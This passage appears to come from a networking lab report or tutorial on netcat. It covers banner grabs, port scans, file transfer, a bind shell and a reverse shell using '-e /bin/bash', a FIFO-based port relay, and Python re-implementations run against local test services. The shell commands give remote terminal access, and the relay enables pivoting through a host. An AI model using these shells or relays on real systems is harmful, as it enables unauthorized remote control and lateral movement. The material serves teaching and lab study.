
Netcat is a networking utility that reads and writes data across network connections using TCP or UDP. The command ‘echo "" | nc -v -n -w1 131.168.10.15 53’ can be used to perform a banner grab to identify a TCP service: the empty echo sends a single newline to the port so that a service which only talks after receiving input has something to respond to. In this example, the ‘-v’ flag puts netcat in ‘verbose’ mode, the ‘-n’ flag tells netcat not to perform a DNS lookup on the IP address, and the ‘-w1’ flag tells netcat to give up after 1 second if the connection or the final read does not complete. In the example in figure 67, netcat could not identify any version information with this method, although various ports and machines were attempted; a silent service (such as DNS on port 53, which only answers well-formed queries) simply returns nothing before the timeout.

Figure 132. Using netcat to perform a banner grab

In the example in figure 68, netcat performs a scan of port 135 on the target 131.168.10.15.

Figure 133. Using netcat to perform a portscan

A banner grab was performed on the www.sunbikes.com website with a HEAD request. As this is considered public information, no law was broken. The output in figure 69 shows that the server header is “Nginx /Varnish”, i.e. the site is served by the Nginx web server behind the Varnish caching proxy.


Figure 134. Banner grab performed on www.sunbikes.com

A second banner grab is performed on 131.168.10.15 on port 80 with a HEAD request. Here it is seen that the server is running Microsoft-IIS/7.5 (figure 70).

Figure 135. Banner grab on 131.168.10.15 target

Finally, a GET request is issued to 131.168.10.15. It returns the same headers as the HEAD request, except that the response body, the HTML of the page, is now returned as well (figure 71).


Figure 136. GET request on 131.168.10.15
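The banner grabs above can be scripted rather than typed into netcat one port at a time. The following Python is an added example, not code from the original report: grab_banner() does what ‘echo "" | nc -v -n -w1 HOST PORT’ does (connect, send an optional probe, return whatever arrives before the timeout), and http_server_header() sends the HEAD request and extracts the Server: header. So that it runs offline, demo() starts three constructed local stand-in services (a fake IIS reply, a fake SMTP greeting, and a silent service standing in for the port-53 attempt); the banner strings are invented for the demonstration.

```python
import socket
import threading


def grab_banner(host, port, probe=b"", timeout=1.0, max_bytes=4096):
    """Connect, optionally send a probe, and return whatever the service says first.
    Equivalent of: echo "" | nc -v -n -w1 HOST PORT  (probe=b"\\n").
    Returns b"" for a closed port or a service that stays silent until the timeout."""
    received = bytearray()
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if probe:
                s.sendall(probe)
            while len(received) < max_bytes:
                try:
                    data = s.recv(max_bytes - len(received))
                except socket.timeout:
                    break  # silent service: nothing arrived within -w1 seconds
                if not data:
                    break  # peer closed the connection
                received.extend(data)
    except OSError:
        pass  # connection refused / unreachable: nothing to report
    return bytes(received)


def http_server_header(host, port, timeout=1.0):
    """Send a HEAD request and return the value of the Server: header, or None."""
    request = f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    raw = grab_banner(host, port, probe=request, timeout=timeout)
    for line in raw.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"server":
            return value.strip().decode(errors="replace")
    return None


# Constructed stand-in services for an offline demonstration (not real hosts).
IIS_REPLY = b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/7.5\r\nContent-Length: 0\r\n\r\n"
SMTP_BANNER = b"220 mail.example.test ESMTP ready\r\n"


def _fake_service(reply, ready, port_box):
    """Accept one client, swallow its input, answer with a canned reply, close."""
    with socket.socket() as srv:
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
        port_box.append(srv.getsockname()[1])
        ready.set()
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(1.0)
            try:
                conn.recv(4096)
            except socket.timeout:
                pass
            conn.sendall(reply)


def _start(reply):
    ready, box = threading.Event(), []
    threading.Thread(target=_fake_service, args=(reply, ready, box), daemon=True).start()
    ready.wait(5)
    return box[0]


def demo():
    """Run the three grabs against the constructed services and return the results."""
    http_port, smtp_port, silent_port = _start(IIS_REPLY), _start(SMTP_BANNER), _start(b"")
    return {
        "http_server": http_server_header("127.0.0.1", http_port),
        "smtp_banner": grab_banner("127.0.0.1", smtp_port, probe=b"\n"),
        "silent": grab_banner("127.0.0.1", silent_port, probe=b"\n"),
    }


if __name__ == "__main__":
    print(demo())
```

Against a real target, swap the loopback ports for the host and port of interest; the timeout is what keeps a scan of many silent ports from hanging, exactly as ‘-w1’ does for netcat.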

In the next task, the Linux Mint virtual machine is set up to listen on port 7777 via the ‘nc -l -p 7777’ command. Then, the second machine (Backtrack) connects to port 7777 on the Linux Mint machine via the ‘nc -v 131.168.10.11 7777’ command. Once the connection is established, text typed on either side is sent over the port to the other.

Figure 137. Using netcat to send text

Netcat can also be used to send files between computers. First, a file to transfer was created (figure 73); then port 7777 was opened on the Linux Mint machine and netcat was instructed to send the contents of transfer.txt over the connection once it is established, with the ‘nc -l -p 7777 < transfer.txt’ command (figure 74). The receiving side connects and redirects netcat's output into a file.

Figure 138. A file to transfer is created


Figure 140. The file is received and saved.

Another feature of netcat that is useful for exploitation purposes is to hand a terminal to whoever connects, using the ‘-e /bin/bash’ flag (available in the traditional netcat and Ncat builds, not in the OpenBSD netcat). First the Linux Mint virtual machine is set to listen on port 7777 with ‘nc -l -p 7777 -e /bin/bash’, and once a host is connected it will bind /bin/bash to the session (figure 76).

Figure 141. Setting up a port to issue a terminal to any incoming connections

Next, the connecting machine (Backtrack) was instructed to connect to port 7777 on 131.168.10.11. This time, however, the connection has a terminal session bound to it. This is demonstrated by issuing the ‘ls’ command to view the current directory on the Linux Mint machine (figure 77).

Figure 142. The attack platform connects to the target and is assigned an active terminal session

Additionally, a reverse shell can also be created. In this scenario the connecting side, not the listening side, is the one binding the terminal to the session. This is useful when a host is behind NAT and cannot be connected to because it only has a private IP address. Instead, the host with the private IP address connects outwards with ‘-e /bin/bash’ to the host with the public IP address. To demonstrate this, the Linux Mint machine once again listens on port 7777 (figure 78), but this time without the ‘-e /bin/bash’ option. Instead, that option is given on the connecting machine (Backtrack) (figure 79). As a result, the ‘ls’ command can be issued on the Linux Mint machine in order to see the current directory on the connecting machine (Backtrack) (figure 80).

Figure 143. Netcat is instructed to open port 7777 and listen

Figure 144. Netcat instructs to connect to target device and port and assign a terminal session

Figure 145. The listening computer now has an active terminal session on the connecting computer

Next, port redirection is set up from the Backtrack machine to the Linux Mint box, and finally to the patched Windows Server 2008 box. To accomplish this, the Linux Mint box has the command ‘nc -l -p 7777 | nc 131.168.10.15 80’ executed, meaning it listens on port 7777 and any incoming data is sent (piped) to 131.168.10.15 on port 80. The Backtrack box then connects to the Linux Mint machine on port 7777 as normal and issues a HEAD request (figure 82). As a result, anything received on port 7777 is forwarded to the Windows 2008 Server. The Wireshark output below proves this with the source and destination IPs and a hex dump of the HEAD request (figure 83).

Figure 146. Incoming data on port 7777 is sent to port 80 on 131.168.10.15


Figure 148. Network traffic of the data transfer redirect as captured by Wireshark

However, the problem is that the pipe is one-way: the server's response arrives at the second netcat on the Linux Mint machine and is printed there, so it never reaches the Backtrack machine. To resolve this, a named pipe (FIFO) called ‘backpipe’ is created with mkfifo. The first netcat reads its standard input from ‘backpipe’ and its output (the request from Backtrack) is appended to the ‘inflow’ log file by tee before being piped to the second netcat, which talks to 131.168.10.15 on port 80. The second netcat's output (the response) is appended to the ‘outflow’ log and written into ‘backpipe’, and because the first netcat is reading from ‘backpipe’, the response is sent back to the Backtrack machine. This was accomplished by executing the ‘nc -l -p 7777 0<backpipe | tee -a inflow | nc 131.168.10.15 80 | tee -a outflow 1>backpipe’ command (figures 84 and 85). The Wireshark output shows the Linux Mint machine sending the Backtrack machine the response to the HEAD request; note that Wireshark labels this traffic as plain TCP rather than HTTP, because port 7777 is not one it decodes as HTTP by default (figure 86).

Figure 149. Using 'backpipe' to relay information back to the original device

Figure 150. The connecting device now receives data sent from 131.168.10.15 through 131.168.10.11


Figure 151. Network traffic showing data redirection, as captured by Wireshark
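The one-way pipe of figure 82 and the backpipe relay of figures 84 to 86 can be expressed in a few dozen lines of Python, which is easier to reason about than the FIFO plumbing. The following is an added example, not code from the original report: Relay listens like ‘nc -l -p 7777’, pumps client-to-target bytes through an inflow log and target-to-client bytes through an outflow log (the two tee calls), and runs the two directions as separate threads, which is the job the ‘backpipe’ FIFO does in the shell version. To run offline, demo() stands up a constructed local HTTP server that answers HEAD with a Server: header of Microsoft-IIS/7.5 in place of the Windows 2008 box.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class Relay:
    """nc -l -p 7777 0<backpipe | tee -a inflow | nc TARGET 80 | tee -a outflow 1>backpipe
    as two pump threads: one per direction, each appending to its own log."""

    def __init__(self, target):
        self.target = target          # (host, port) the second netcat connects to
        self.inflow = bytearray()     # client -> target bytes (tee -a inflow)
        self.outflow = bytearray()    # target -> client bytes (tee -a outflow)
        self.port = None
        self._ready = threading.Event()

    def start(self):
        threading.Thread(target=self._serve, daemon=True).start()
        self._ready.wait(5)
        return self.port

    def _serve(self):
        with socket.socket() as srv:
            srv.bind(("127.0.0.1", 0))
            srv.listen(1)
            self.port = srv.getsockname()[1]
            self._ready.set()
            client, _ = srv.accept()
            with client, socket.create_connection(self.target) as upstream:
                forward = threading.Thread(target=self._pump, args=(client, upstream, self.inflow))
                forward.start()
                # The return path: without it the reply dies on the relay host, as in figure 82.
                self._pump(upstream, client, self.outflow)
                forward.join()

    @staticmethod
    def _pump(src, dst, log):
        while True:
            data = src.recv(4096)
            if not data:
                break
            log.extend(data)
            dst.sendall(data)
        try:
            dst.shutdown(socket.SHUT_WR)  # pass the EOF along so the other side finishes
        except OSError:
            pass


def head_through_relay(port):
    """The Backtrack side: connect to the relay and issue a HEAD request."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
        reply = bytearray()
        while True:
            data = s.recv(4096)
            if not data:
                break
            reply.extend(data)
        return bytes(reply)


class _FakeIIS(BaseHTTPRequestHandler):
    """Constructed stand-in for the Windows 2008 box; the banner is invented."""
    def version_string(self):
        return "Microsoft-IIS/7.5"

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass


def demo():
    """Send a HEAD request through the relay; return (reply, inflow log, outflow log)."""
    httpd = HTTPServer(("127.0.0.1", 0), _FakeIIS)
    threading.Thread(target=httpd.handle_request, daemon=True).start()
    relay = Relay(httpd.server_address)
    reply = head_through_relay(relay.start())
    return reply, bytes(relay.inflow), bytes(relay.outflow)


if __name__ == "__main__":
    reply, inflow, outflow = demo()
    print(reply.decode(errors="replace"))
```

The inflow log holds exactly the request the client sent and the outflow log exactly the response the client received, which is what the ‘inflow’ and ‘outflow’ files on the Linux Mint machine contain after the shell version runs.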
